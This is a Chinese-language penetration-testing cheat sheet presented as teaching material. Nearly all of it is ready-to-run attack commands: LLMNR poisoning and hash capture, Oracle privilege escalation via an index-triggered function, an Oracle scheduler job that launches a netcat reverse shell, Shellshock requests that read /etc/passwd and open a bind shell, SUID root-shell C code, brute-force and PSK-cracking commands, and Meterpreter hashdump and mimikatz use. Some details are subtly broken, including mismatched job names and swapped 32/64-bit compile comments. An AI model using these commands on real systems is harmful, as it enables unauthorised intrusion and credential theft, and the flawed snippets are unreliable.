渗透测试工具备忘录 - 详尽教学文档
1. 开始前的准备
1.1 网络配置
# 设置IP地址
ifconfig eth0 xxx.xxx.xxx.xxx/24
# 子网划分
ipcalc xxx.xxx.xxx.xxx/24
ipcalc xxx.xxx.xxx.xxx 255.255.255.0
1.2 公开来源情报收集
DNS查询
# WHOIS查询
whois domain-name-here.com
# 查询DNS IP
dig a domain-name-here.com @nameserver
# 查询MX记录
dig mx domain-name-here.com @nameserver
# 用DIG查询域传送
dig axfr domain-name-here.com @nameserver
DNS域传送
# Windows DNS域传送
nslookup
> set type=any
> ls -d blah.com
# Linux DNS域传送
dig axfr blah.com @ns1.blah.com
邮件枚举
git clone https://github.com/killswitch-GUI/SimplyEmail.git
./SimplyEmail.py -all -e TARGET-DOMAIN
2. 信息收集
2.1 基本指纹识别
# 通过显示banner识别版本和指纹
nc -v 192.168.1.1 25
telnet 192.168.1.1 25
# 使用NC抓取banner
nc TARGET-IP 80
GET / HTTP/1.1
Host: TARGET-IP
User-Agent: Mozilla/5.0
Referrer: meh-domain
<enter>
2.2 DNS爆破
# DNSRecon DNS枚举
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
2.3 端口扫描
Nmap基本命令
nmap -v -sS -A -T4 target # 详细显示,syn探测,高速扫描,系统和服务版本信息,脚本扫描和路由跟踪
nmap -v -sS -p- -A -T4 target # 同上,且扫描所有TCP端口,耗时更长
nmap -v -sU -sS -p- -A -T4 target # 同上,且扫描所有UDP端口,耗时巨长
Nmap特殊扫描
# 扫描可能包含漏洞的SMB服务
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X
# 搜索nmap脚本
ls /usr/share/nmap/scripts/* | grep ftp
UDP扫描
nmap -sU TARGET # UDP协议扫描
# 使用专用UDP扫描器
git clone https://github.com/portcullislabs/udp-proto-scanner.git
./udp-protocol-scanner.pl -f ip.txt # 扫描文件中IP地址的所有服务
./udp-proto-scanner.pl -p ntp -f ips.txt # 扫描特定UDP服务
2.4 其他主机发现方法
netdiscover -r 192.168.1.0/24 # 利用ARP发现同网段的IP,MAC地址和MAC厂商
3. 枚举和攻击网络服务
3.1 SMB/Samba枚举
# SMB枚举工具
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
# 寻找开放的SMB共享
smbclient -L //192.168.1.100
# 枚举SMB共享
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24
# 枚举SMB用户
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX
# RID循环(RID Cycling)
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
手动测试空会话
# Windows:
net use \\TARGET\IPC$ "" /u:""
# Linux:
smbclient -L //192.168.99.131
NBTScan
apt-get install nbtscan-unixwiz
nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan
3.2 LLMNR/NBT-NS欺骗
使用Metasploit
# LLMNR/NetBIOS请求欺骗/毒化
auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
# 抓取哈希
auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm
使用Responder
git clone https://github.com/SpiderLabs/Responder.git
python Responder.py -i local-ip -I eth0
3.3 SNMP枚举
SNMP工具
# 美化SNMP输出
apt-get install snmp-mibs-downloader
download-mibs
echo "" > /etc/snmp/snmp.conf
# SNMP枚举命令
snmpcheck -t 192.168.1.X -c public
snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d -f
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts
SNMPv3枚举
# 识别SNMPv3服务器
nmap -sV -p 161 --script=snmp-info TARGET-SUBNET
# 安装工具
apt-get install snmp snmp-mibs-downloader
wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
3.4 远程服务枚举
RSH枚举
# RSH运行命令
rsh <target> <command>
# RSH登陆扫描
auxiliary/scanner/rservices/rsh_login
# 使用rusers显示已登陆用户
rusers -al 192.168.2.1
# 使用rlogin扫描整个子网
rlogin -l <user> <target>
Finger枚举
finger @TARGET-IP
finger batman@TARGET-IP
3.5 TLS/SSL测试
# 测试单一主机并将结果输出的HTML文件
./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html
4. 漏洞评估
4.1 OpenVAS安装
apt-get update
apt-get dist-upgrade -y
apt-get install openvas
openvas-setup
检查OpenVAS运行状态:
netstat -tulpn
通过 https://127.0.0.1:9392 登陆openvas
5. 数据库渗透测试
5.1 Oracle测试
安装工具
apt-get install oscanner tnscmd10g
识别Oracle服务
# Oracle TNS版本指纹识别
tnscmd10g version -h TARGET
nmap --script=oracle-tns-version
# 爆破Oracle账户
nmap --script=oracle-sid-brute
nmap --script=oracle-brute
Oracle权限提升
- 使用NMAP NSE脚本验证oracle数据库中的默认账户
- 使用脆弱账号登陆
- 确认oracle用户的权限级别
select * from session_privs;
- 创建提权函数
CREATE OR REPLACE FUNCTION GETDBA(FOO varchar) return varchar deterministic authid curren_user is pragma autonomous_transaction; begin execute immediate 'grant dba to user1 identified by pass1';commit;return 'FOO';end;
- 创建索引触发函数
create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA('BAR'));
- 验证权限
Select * from session_privs;
- 清除痕迹
drop index exploit_1337;
获取Oracle反弹shell
begin
dbms_scheduler.create_job(
job_name => 'MEH1337',
job_type => 'EXECUTABLE',
job_action => '/bin/nc',
number_of_arguments => 4,
start_date => SYSTIMESTAMP,
enabled => FALSE,
auto_drop => TRUE);
dbms_scheduler.set_job_argument_value('rev_shell', 1, 'TARGET-IP');
dbms_scheduler.set_job_argument_value('rev_shell', 2, '443');
dbms_scheduler.set_job_argument_value('rev_shell', 3, '-e');
dbms_scheduler.set_job_argument_value('rev_shell', 4, '/bin/bash');
dbms_scheduler.enable('rev_shell');
end;
5.2 MSSQL测试
枚举/发现
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Metasploit模块
use auxiliary/scanner/mssql/mssql_ping
use auxiliary/admin/mssql/mssql_enum
Metasploit获取Shell
use exploit/windows/mssql/mssql_payload
set PAYLOAD windows/meterpreter/reverse_tcp
6. 网络隧道与跳板
6.1 Plink.exe隧道
# 转发运程端口到本地地址
plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP
6.2 SSH跳板
# 一级跳板
ssh -D 127.0.0.1:1010 -p 22 user@pivot-target-ip
# 在/etc/proxychains.conf添加
sock4 127.0.0.1 1010
# 二级跳板
proxychains ssh -D 127.0.0.1:1011 -p 22 user1@ip-address-2
# 在/etc/proxychains.conf添加
sock4 127.0.0.1 1011
6.3 Meterpreter跳板
portfwd add –l 3389 –p 3389 –r target # 端口转发
portfwd delete –l 3389 –p 3389 –r target # 删除端口转发
7. 网络基础知识
7.1 TTL指纹识别
| 操作系统 |
TTL值 |
| Windows |
128 |
| Linux |
64 |
| Solaris |
255 |
| Cisco/Network |
255 |
7.2 IPv4速查
各类IP地址范围
| 类别 |
IP地址范围 |
| A类 |
0.0.0.0 - 127.255.255.255 |
| B类 |
128.0.0.0 - 191.255.255.255 |
| C类 |
192.0.0.0 - 223.255.255.255 |
| D类 |
224.0.0.0 - 239.255.255.255 |
| E类 |
240.0.0.0 - 255.255.255.255 |
IPv4私有地址
| 类别 |
范围 |
| A类私有地址 |
10.0.0.0 - 10.255.255.255 |
| B类私有地址 |
172.16.0.0 - 172.31.255.255 |
| C类私有地址 |
192.168.0.0 - 192.168.255.255 |
7.3 IPv4子网速查表
| CIDR |
十进制掩码 |
主机数量 |
| /31 |
255.255.255.254 |
1 Host |
| /30 |
255.255.255.252 |
2 Hosts |
| ... |
... |
... |
| /24 |
255.255.255.0 |
254 Hosts |
| ... |
... |
... |
| /8 |
255.0.0.0 |
16777214 Hosts |
8. 高级攻击技术
8.1 VLAN跳跃攻击
git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh
8.2 VPN测试
识别VPN服务器
./udp-protocol-scanner.pl -p ike TARGET(s)
./udp-protocol-scanner.pl -p ike -f ip.txt
IKEForce工具
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git
# 枚举VPN组名
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
# 爆破VPN
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
IKE扫描
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
IKE激进模式PSK破解流程
- 验证IKE服务器
./udp-protocol-scanner.pl -p ike SUBNET/24
- 枚举组名
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
- 抓取PSK哈希
ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP
- 破解PSK哈希
psk-crack hash-file.txt
# 高级选项
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
8.3 PPTP攻击
# 验证PPTP服务
nmap –Pn -sV -p 1723 TARGET(S)
# PPTP字典攻击
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
8.4 DNS隧道
攻击机器设置
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
# 运行dnscat2
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422
目标机器
dnscat --host <dnscat server_ip>
9. 漏洞利用
9.1 Exploit搜索
# 从exploit-db搜索
searchsploit windows 2003 | grep -i local
# Google搜索
site:exploit-db.com exploit kernel <= 3
# 搜索metasploit模块
grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/*
# 本地exploit-db搜索
searchsploit –u
searchsploit apache 2.2
searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local
9.2 交叉编译Exploits
在Kali上编译Windows的exp
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
通用交叉编译
gcc -m32 -o output32 hello.c # 32位
gcc -m64 -o output hello.c # 64位
9.3 利用Shellshock漏洞
git clone https://github.com/nccgroup/shocker
./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
# 查看文件内容
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent:echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
# 运行bind shell
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent:usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
# 反弹shell
nc -l -p 443
10. 实用工具与技巧
10.1 本地Web服务器
python -m SimpleHTTPServer 80 # Python2
python3 -m http.server # Python3
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start" # Ruby
php -S 0.0.0.0:80 # PHP
10.2 挂载文件共享
# 挂载NFS共享
mount 192.168.1.1:/vol/share /mnt/nfs
# 挂载Windows共享
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs
# Windows挂载共享
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no
# 安装smb4k
apt-get install smb4k -y
10.3 HTTP/HTTPS Web服务枚举
nikto -h 192.168.1.1 # 对目标使用nikto进行扫描
dirbuster # 使用GUI配置
10.4 数据包侦测
tcpdump tcp port 80 -w output.pcap -i eth0 # 将网卡eth0的80端口的流量导出到output.pcap
10.5 用户名枚举
SMB用户枚举
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
SNMP用户枚举
snmpwalk public -v1 192.168.X.XXX 1 | grep 77.1.2.25 | cut -d" " -f4
python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt # 然后grep结果
10.6 密码字典
/usr/share/wordlists # Kali的字典存放路径
11. 密码破解
11.1 Hydra爆破
爆破FTP
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V
爆破POP3
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V
爆破SMTP
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V
11.2 John The Ripper (JTR)
john --wordlist=/usr/share/wordlists/rockyou.txt hashes # 使用字典破解
john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt # 指定哈希类型
john --format=descrypt hash --show # 显示破解结果
12. Linux渗透测试技巧
12.1 SUID二进制
C代码示例
// 运行/bin/bash的SUID C Shell
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
// 运行/bin/sh的SUID C Shell
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
编译
gcc -o suid suid.c # 32位
gcc -m32 -o suid suid.c # 64位系统编译32位
12.2 TTY Shell技巧
python -c 'import pty;pty.spawn("/bin/bash")' # Python
echo os.system('/bin/bash') # sh
/bin/sh -i # sh交互式
perl —e 'exec "/bin/sh";' # Perl
exec "/bin/sh" # Ruby
os.execute('/bin/sh') # Lua
:!bash # 从Vi
!sh # NMAP
13. Metasploit速查表
13.1 Meterpreter Payloads
set payload windows/meterpreter/reverse_tcp # Windows反向tcp
set payload windows/vncinject/reverse_tcp # Windows VNC
set ViewOnly false # VNC可交互
set payload linux/meterpreter/reverse_tcp # Linux反向
13.2 Meterpreter命令
upload file c:\\windows # 上传文件
download c:\\windows\\repair\\sam /tmp # 下载文件
execute -f c:\\windows\temp\exploit.exe # 执行文件
execute -f cmd -c # 创建新cmd shell
ps # 显示进程
shell # 获取目标shell
getsystem # 尝试提权
hashdump # 导出哈希
13.3 常用Metasploit模块
远程Windows漏洞
use exploit/windows/smb/ms08_067_netapi # MS08_067 Windows 2k, XP, 2003
use exploit/windows/dcerpc/ms06_040_netapi # MS08_040 Windows NT, 2k, XP, 2003
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index # MS09_050 Windows Vista SP1/SP2和Server 2008
本地Windows漏洞
use exploit/windows/local/bypassuac # 绕过Windows 7 UAC
辅助模块
use auxiliary/scanner/http/dir_scanner # HTTP目录扫描
use auxiliary/scanner/http/jboss_vulnscan # JBOSS漏扫
use auxiliary/scanner/mssql/mssql_login # MSSQL认证扫描
use auxiliary/scanner/mysql/mysql_version # MySQL版本扫描
use auxiliary/scanner/oracle/oracle_login # Oracle登陆
Powershell模块
use exploit/multi/script/web_delivery # powershell payload传送
use post/windows/manage/powershell/exec_powershell # 上传执行powershell脚本
use exploit/multi/http/jboss_maindeployer # JBOSS部署
use exploit/windows/mssql/mssql_payload # MSSQL payload
Windows后渗透模块
run post/windows/gather/win_privs # 显示当前用户权限
use post/windows/gather/credentials/gpp # 提取GPP保存的密码
load mimikatz -> wdigest # 加载Mimikatz
run post/windows/gather/local_admin_search_enum # 检查域内管理员权限
run post/windows/gather/smart_hashdump # 自动化导出sam文件
14. SQLMap示例
# 自动化扫描
sqlmap -u meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3
# 指定目标扫描
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"
# 使用联合查询技术扫描mysql
sqlmap -u "meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump
# 检测表单注入点
sqlmap -o -u "meh.com/form/" --forms
# 导出指定数据库表
sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump
15. ASCII表速查
| ASCII字符 |
描述 |
| x00 |
Null Byte 空字节 |
| x08 |
BS 退格 |
| x09 |
TAB 水平制表符 |
| x0a |
LF 换行 |
| x0d |
CR 回车 |
| x20 |
SPC 空格 |
| ... |
... |
16. Cisco IOS命令
enable # 进入使能模式
conf t # 配置终端
(config)# interface fa0/0 # 配置FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255 # 添加IP到fa0/0
(config-if)# line vty
